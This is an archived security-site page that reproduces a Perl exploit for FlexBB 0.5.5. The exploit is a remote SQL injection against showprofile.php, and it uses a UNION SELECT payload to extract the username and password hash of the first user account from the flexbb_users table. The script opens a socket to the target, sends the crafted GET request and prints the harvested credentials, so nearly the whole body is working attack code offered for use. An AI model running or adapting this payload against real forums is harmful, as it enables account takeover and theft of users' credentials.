Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: b06-1807.htm

FlexBB 0.5.5 Exploit Remote SQL Injection



FlexBB 0.5.5 Exploit Remote SQL Injection
FlexBB 0.5.5 Exploit Remote SQL Injection



#!/usr/bin/perl
use IO::Socket;
#FlexBB Exploit [ function/showprofile.php ] Remote SQL Injection
#
#        1- First Do Login
#        2- View This Link :D
#
#        index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbb_users WHERE id=1/*
#
#-----------------------------------------------#
#
#--[ D3vil-0x1 | Devil-00 ]--#
#
# SecurityGurus.net
#               Div The PHP Security Fucking Tool :D

##-- Start --#

$host         = "127.0.0.1";
$path         = "/flexbb/";
$injec        = "-1'%20UNION%20ALL%20SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8%20FROM%20flexbb_users%20WHERE%20id=1/*";

##-- _END_ --##
#        $host                :-
# The Host Name Without http:// | exm. www.vic.com 
#
#        $path                :-
#                                FlexBB Dir On Server | exm. /flexbb/
#
#        $mycookie             :-
#                                Your Login Info To Forum *  Not The Real Password || The Hashed One *


$sock = IO::Socket::INET->new (
                                                                                PeerAddr => "$host",
                                                                                PeerPort => "80",
                                                                                Proto    => "tcp"
                                                                                ) or die("[!] Connect To Server Was Filed");

##-- DONT TRY TO EDIT ME --##
$evildata  = "GET ".$path."index.php?page=showprofile&id=".$injec." HTTP/1.1\n";
$evildata .= "Host: $host \n";
$evildata .= "Accept: */* \n";
$evildata .= "Keep-Alive: 300\n";
$evildata .= "Connection: keep-alive \n\n";

print $sock $evildata;

while($ans = <$sock>){
       $usr_newans = $ans;
       $pwd_newans = $ans;
       #print $newans;
       $usr_newans =~ m/FlexBB - Viewing Profile: (.*?)<\/title>/ && print "[+] Username is :- ".$1."\n";
       $pwd_newans =~ m/<a href="2" target="_blank">(.*?)<\/a>/ && print "[+] Password is :- ".$1."\n";
}

</b></font></pre></tt></body></html>


<!-- google_ad_section_end -->
<p><center>
<br>
<script type="text/javascript"><!--
google_ad_client = "pub-7461597152411296";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text";
//2007-07-08: TUCoPS
google_ad_channel = "2214400198";
google_color_border = "C3D9FF";
google_color_bg = "F8FFFF";
google_color_link = "003366";
google_color_text = "000000";
google_color_url = "009988";
google_ui_features = "rc:6";
//-->
</script>
<script type="text/javascript"
  src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<p>
<iframe src="http://astore.amazon.com/aohstore-20" width="90%" height="1000" frameborder="0" scrolling="no"></iframe>
<p>


<p></center>
<center><a href="/firefox.htm">TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).</a></center>
<font size=1><center>Site design & layout copyright © 1986-2014 AOH</font>
</center>
<br><center><IMG SRC="http://artofhacking.com/cgi-bin/sc/sc.cgi?acct=tucops&font=payphone-med"></center>
<p>
</body>
</html>